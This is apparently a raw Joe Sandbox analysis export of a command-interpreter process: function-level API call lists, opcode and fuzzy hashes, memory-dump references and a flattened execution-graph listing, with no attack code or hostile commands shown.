                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                        • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                        • Instruction ID: 67d30fe882b0f2402c607739c5c18ba23279a5c016b85e152fa12516c14bfebc
                                                                                                                                                                        • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                                                                        • Instruction Fuzzy Hash: 8D11F572A04B91C6EB008F56E4441ADBBB0FB89F84B598125DB4E43728EF38E45AC744
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 140117192-0
                                                                                                                                                                        • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                        • Instruction ID: 82cc835333b58ddb4b5ef44f61bc9ac8831998dc97b3b6812f151f29c402abf3
                                                                                                                                                                        • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                                                                        • Instruction Fuzzy Hash: BE21AF36918B45C5EB40AF94E88436973A4FF88B54F500136EA8D82764DF7EE488CB0A
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AD6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AEF
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
                                                                                                                                                                          • Part of subcall function 00007FF6E9434A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E943EE64
                                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 00007FF6E943EE78
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2759988882-0
                                                                                                                                                                        • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                        • Instruction ID: a5950dd76105495b22b0fc352e10142c80102530ac2d1e3d05b86dbded8bf74c
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                                                                                                                                        • Instruction Fuzzy Hash: 5FF0E762E19A42C6EF159FB6A409279A9D1FF8EB41F48D434CD0EC2350EE3EA448C716
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1606018815-0
                                                                                                                                                                        • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                        • Instruction ID: a5ff23bcb7b88ae8f016aeaa4aefd8c70e51e0af63db0679426f06fcca59fd60
                                                                                                                                                                        • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                                                                        • Instruction Fuzzy Hash: 89F01533A24A82CBE7045F50E854279BA60FF8AB02F84A274DA0B42394DF3ED409CB05
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDA6
                                                                                                                                                                          • Part of subcall function 00007FF6E942CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942B9A1,?,?,?,?,00007FF6E942D81A), ref: 00007FF6E942CDBD
                                                                                                                                                                        • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6E944827A), ref: 00007FF6E94511DC
                                                                                                                                                                        • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF6E944827A), ref: 00007FF6E9451277
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                        • API String ID: 1135967885-381716982
APIs
  • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
  • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
  • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
  • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
  • Part of subcall function 00007FF6E942EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF6E942E626,?,?,00000000,00007FF6E9431F69), ref: 00007FF6E942F000
  • Part of subcall function 00007FF6E942EF40: wcschr.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F031
  • Part of subcall function 00007FF6E942EF40: iswdigit.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E942F0D6
• longjmp.MSVCRT ref: 00007FF6E943CCBC
• longjmp.MSVCRT(?,?,00000000,00007FF6E9431F69,?,?,?,?,?,?,?,00007FF6E942286E,00000000,00000000,00000000,00000000), ref: 00007FF6E943CCE0
Strings
Similarity
• API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
• String ID: GeToken: (%x) '%s'
• API String ID: 3282654869-1994581435
APIs
Strings
Similarity
• API ID: memmovewcsncmp
• String ID: 0123456789
• API String ID: 3879766669-2793719750
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E94497D0
  • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
  • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
  • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E94498D7
Strings
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\Classes
• API String ID: 2714550308-1656466771
APIs
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944A0FC
  • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
  • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
  • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
  • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6E944A1FB
Strings
Similarity
• API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
• String ID: Software\Classes
• API String ID: 2714550308-1656466771
APIs
Strings
Similarity
• API ID: ConsoleTitle
• String ID: -
• API String ID: 3358957663-3695764949
APIs
Strings
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmpswscanf
                                                                                                                                                                        • String ID: :EOF
                                                                                                                                                                        • API String ID: 1534968528-551370653
                                                                                                                                                                        • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                        • Instruction ID: 2d1bef405d7cfb3846757791ce6190d270f5984144e6dbcad9d7d129a98a2a47
                                                                                                                                                                        • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                                                                        • Instruction Fuzzy Hash: E831AD33A1CA46C6FB24DF75A8443B872A0EF44B50F444131EA8D86291DF3EEA49C70A
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsnicmp
                                                                                                                                                                        • String ID: /-Y
                                                                                                                                                                        • API String ID: 1886669725-4274875248
                                                                                                                                                                        • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                        • Instruction ID: 1655e4901edd684456386f8b6fe436d5a820228f0c1084cfe40d765b97cfb170
                                                                                                                                                                        • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                        • Instruction Fuzzy Hash: 4B216B67A08766C1EB209F069454378B7A0BF58FC0F448031DE9887794DE3EE89AD70A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 3$3
                                                                                                                                                                        • API String ID: 0-2538865259
                                                                                                                                                                        • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                        • Instruction ID: cee0916306b73ef24a22d1c29d116b7304dfb9867761d6d495ce26164fcd177c
                                                                                                                                                                        • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                                                                        • Instruction Fuzzy Hash: 8C0117B3D2A582CAF3198F6098843783660BF56311F944235C41EC25A2EF3FA48CC74B
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
                                                                                                                                                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
                                                                                                                                                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1617791916-0
                                                                                                                                                                        • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                        • Instruction ID: 9413b77cc577ea127f21def1436a65c560e4248cdff187de32ad99cfebdd5d5d
                                                                                                                                                                        • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                                                                        • Instruction Fuzzy Hash: 7D414CB3A19742C6EA158F20E44827EB7A0FF85B80F548634DA4D83755DF3EE448C74A

Execution Graph

Execution Coverage: 5.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 637
Total number of Limit Nodes: 23
execution_graph: node/edge dump of the rendered Execution Graph figure for process 4 (image base 7ff6e9420000; entry chain from 7ff6e9438d80 through GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, GetThreadLocale, VirtualQuery, GetConsoleOutputCP and GetCPInfo, with further branches through wcschr, GetConsoleTitleW/SetConsoleTitleW, VirtualFree, _setjmp/longjmp, _dup2 and _close). The raw edge list is not reproduced here.
22541->22542 22546 7ff6e942b6b0 170 API calls 22541->22546 22543 7ff6e942ff70 2 API calls 22542->22543 22543->22515 22544 7ff6e942d840 178 API calls 22544->22550 22545 7ff6e942b6b0 170 API calls 22545->22534 22548 7ff6e942c2ac 22546->22548 22547->22540 22548->22538 22548->22542 22549 7ff6e942c3d4 22549->22538 22549->22542 22549->22545 22550->22515 22550->22542 22550->22544 22550->22549 22552 7ff6e942ca40 17 API calls 22551->22552 22567 7ff6e942b162 22552->22567 22553 7ff6e942b2f7 ??_V@YAXPEAX 22554 7ff6e942b303 22553->22554 22556 7ff6e9438f80 7 API calls 22554->22556 22555 7ff6e942b1d9 22559 7ff6e942cd90 166 API calls 22555->22559 22574 7ff6e942b1ed 22555->22574 22558 7ff6e942b315 22556->22558 22557 7ff6e9431ea0 8 API calls 22557->22567 22558->22448 22558->22459 22559->22574 22561 7ff6e943bfef _get_osfhandle SetFilePointer 22564 7ff6e943c01d 22561->22564 22561->22574 22562 7ff6e942b228 _get_osfhandle 22563 7ff6e942b23f _get_osfhandle 22562->22563 22562->22574 22563->22574 22566 7ff6e94333f0 _vsnwprintf 22564->22566 22569 7ff6e943c038 22566->22569 22567->22555 22567->22557 22567->22567 22582 7ff6e942b2e1 22567->22582 22568 7ff6e94301b8 6 API calls 22568->22574 22573 7ff6e9423278 166 API calls 22569->22573 22570 7ff6e94333f0 _vsnwprintf 22570->22569 22571 7ff6e942d208 _close 22571->22574 22572 7ff6e94326e0 19 API calls 22572->22574 22575 7ff6e943c1f9 22573->22575 22574->22561 22574->22562 22574->22568 22574->22571 22574->22572 22577 7ff6e942b038 _dup2 22574->22577 22578 7ff6e943c060 22574->22578 22579 7ff6e943c246 22574->22579 22580 7ff6e943c1a5 22574->22580 22574->22582 22586 7ff6e942b356 22574->22586 22599 7ff6e943c1c3 22574->22599 22722 7ff6e942affc _dup 22574->22722 22724 7ff6e944f318 _get_osfhandle GetFileType 22574->22724 22576 7ff6e942af98 2 API calls 22575->22576 22576->22582 22577->22574 22578->22579 22584 7ff6e94309f4 2 API calls 22578->22584 22581 7ff6e942af98 2 API calls 22579->22581 22583 7ff6e942b038 _dup2 22580->22583 22585 7ff6e943c24b 22581->22585 
22582->22553 22582->22554 22587 7ff6e943c1b7 22583->22587 22588 7ff6e943c084 22584->22588 22589 7ff6e944f1d8 166 API calls 22585->22589 22595 7ff6e942af98 2 API calls 22586->22595 22590 7ff6e943c207 22587->22590 22591 7ff6e943c1be 22587->22591 22592 7ff6e942b900 166 API calls 22588->22592 22589->22582 22594 7ff6e942d208 _close 22590->22594 22596 7ff6e942d208 _close 22591->22596 22593 7ff6e943c08c 22592->22593 22597 7ff6e943c094 wcsrchr 22593->22597 22610 7ff6e943c0ad 22593->22610 22594->22586 22598 7ff6e943c211 22595->22598 22596->22599 22597->22610 22600 7ff6e94333f0 _vsnwprintf 22598->22600 22599->22570 22601 7ff6e943c22c 22600->22601 22602 7ff6e9423278 166 API calls 22601->22602 22602->22582 22603 7ff6e943c106 22604 7ff6e942ff70 2 API calls 22603->22604 22606 7ff6e943c13b 22604->22606 22605 7ff6e943c0e0 _wcsnicmp 22605->22610 22606->22579 22607 7ff6e943c146 SearchPathW 22606->22607 22607->22579 22608 7ff6e943c188 22607->22608 22609 7ff6e94326e0 19 API calls 22608->22609 22609->22580 22610->22603 22610->22605 22612 7ff6e9427279 22611->22612 22614 7ff6e9427211 _setjmp 22611->22614 22612->22462 22614->22612 22615 7ff6e9427265 22614->22615 22725 7ff6e94272b0 22615->22725 22618 7ff6e942cb63 22617->22618 22619 7ff6e942cd90 166 API calls 22618->22619 22620 7ff6e942cb99 22619->22620 22620->22491 22620->22512 22622 7ff6e942cad9 22621->22622 22623 7ff6e942cb05 22621->22623 22622->22623 22624 7ff6e942cd90 166 API calls 22622->22624 22633 7ff6e9434224 InitializeProcThreadAttributeList 22623->22633 22625 7ff6e943c722 22624->22625 22625->22623 22626 7ff6e943c72e GetConsoleTitleW 22625->22626 22626->22623 22627 7ff6e943c74a 22626->22627 22628 7ff6e942b6b0 170 API calls 22627->22628 22632 7ff6e943c778 22628->22632 22629 7ff6e943c7ec 22630 7ff6e942ff70 2 API calls 22629->22630 22630->22623 22631 7ff6e943c7dd SetConsoleTitleW 22631->22629 22632->22629 22632->22631 22634 7ff6e94342ab UpdateProcThreadAttribute 22633->22634 22635 7ff6e943ecd4 GetLastError 22633->22635 22636 
7ff6e94342eb memset memset GetStartupInfoW 22634->22636 22637 7ff6e943ecf0 GetLastError 22634->22637 22638 7ff6e943ecee 22635->22638 22640 7ff6e9433a90 170 API calls 22636->22640 22706 7ff6e9449eec 22637->22706 22642 7ff6e94343a8 22640->22642 22643 7ff6e942b900 166 API calls 22642->22643 22644 7ff6e94343bb 22643->22644 22645 7ff6e9434638 _local_unwind 22644->22645 22646 7ff6e94343cc 22644->22646 22645->22646 22647 7ff6e94343de wcsrchr 22646->22647 22648 7ff6e9434415 22646->22648 22647->22648 22649 7ff6e94343f7 lstrcmpW 22647->22649 22693 7ff6e9435a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22648->22693 22649->22648 22651 7ff6e9434668 22649->22651 22694 7ff6e9449044 22651->22694 22652 7ff6e943441a 22654 7ff6e943442a CreateProcessW 22652->22654 22656 7ff6e9434596 CreateProcessAsUserW 22652->22656 22655 7ff6e943448b 22654->22655 22657 7ff6e9434495 CloseHandle 22655->22657 22658 7ff6e9434672 GetLastError 22655->22658 22656->22655 22659 7ff6e943498c 8 API calls 22657->22659 22663 7ff6e943468d 22658->22663 22660 7ff6e94344c5 22659->22660 22661 7ff6e94344cd 22660->22661 22660->22663 22662 7ff6e94347a3 22661->22662 22680 7ff6e944a250 33 API calls 22661->22680 22684 7ff6e94344f8 22661->22684 22662->22506 22663->22661 22664 7ff6e942cd90 166 API calls 22663->22664 22665 7ff6e9434724 22664->22665 22668 7ff6e943472c _local_unwind 22665->22668 22673 7ff6e943473d 22665->22673 22666 7ff6e9435cb4 7 API calls 22670 7ff6e9434517 22666->22670 22667 7ff6e943461c 22671 7ff6e942ff70 GetProcessHeap RtlFreeHeap 22667->22671 22668->22673 22669 7ff6e94347e1 CloseHandle 22669->22667 22672 7ff6e94333f0 _vsnwprintf 22670->22672 22674 7ff6e94347fa DeleteProcThreadAttributeList 22671->22674 22675 7ff6e9434544 22672->22675 22681 7ff6e942ff70 GetProcessHeap RtlFreeHeap 22673->22681 22676 7ff6e9438f80 7 API calls 22674->22676 22677 7ff6e943498c 8 API calls 22675->22677 22678 7ff6e9434820 22676->22678 22679 7ff6e9434558 22677->22679 22678->22506 22682 7ff6e94347ae 22679->22682 
